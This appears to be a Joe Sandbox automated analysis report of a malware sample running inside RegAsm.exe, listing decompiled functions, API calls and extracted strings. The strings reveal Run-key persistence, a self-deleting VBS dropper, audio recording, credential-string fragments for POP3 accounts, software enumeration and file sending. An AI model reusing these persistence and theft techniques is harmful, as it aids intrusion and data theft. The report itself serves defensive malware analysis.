                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                • ExitProcess.KERNEL32 ref: 0040D80B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                • API String ID: 1861856835-1447701601
                                                • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,68491986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                • ExitProcess.KERNEL32 ref: 0040D454
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                • API String ID: 3797177996-2483056239
                                                • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                • API String ID: 2649220323-436679193
                                                • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                • SetEvent.KERNEL32 ref: 0041B2AA
                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                • CloseHandle.KERNEL32 ref: 0041B2CB
                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                • API String ID: 738084811-2094122233
                                                • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Write$Create
                                                • String ID: RIFF$WAVE$data$fmt
                                                • API String ID: 1602526932-4212202414
                                                • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                • API String ID: 1646373207-255920310
                                                • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                • API String ID: 4218353326-3023110444
                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 0040CE42
                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                • CopyFileW.KERNEL32 ref: 0040CF0B
                                                • _wcslen.LIBCMT ref: 0040CF21
                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                • CopyFileW.KERNEL32 ref: 0040CFBF
                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                • _wcslen.LIBCMT ref: 0040D001
                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                • CloseHandle.KERNEL32 ref: 0040D068
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                • ExitProcess.KERNEL32 ref: 0040D09D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                • API String ID: 1579085052-2309681474
                                                • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                • _wcslen.LIBCMT ref: 0041C1CC
                                                • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                • GetLastError.KERNEL32 ref: 0041C204
                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                • GetLastError.KERNEL32 ref: 0041C261
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                • String ID: ?
                                                • API String ID: 3941738427-1684325040
                                                • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                • API String ID: 4218353326-230879103
                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                Function 0044F4AD Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$EnvironmentVariable
                                                • String ID:
                                                • API String ID: 1464849758-0
                                                • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                • API String ID: 1332880857-3714951968
                                                • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                • GetCursorPos.USER32(?), ref: 0041D67A
                                                • SetForegroundWindow.USER32(?), ref: 0041D683
                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                • ExitProcess.KERNEL32 ref: 0041D6F6
                                                • CreatePopupMenu.USER32 ref: 0041D6FC
                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                • String ID: Close
                                                • API String ID: 1657328048-3535843008
                                                • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$Info
                                                • String ID:
                                                • API String ID: 2509303402-0
                                                • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                • __aulldiv.LIBCMT ref: 00408D88
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
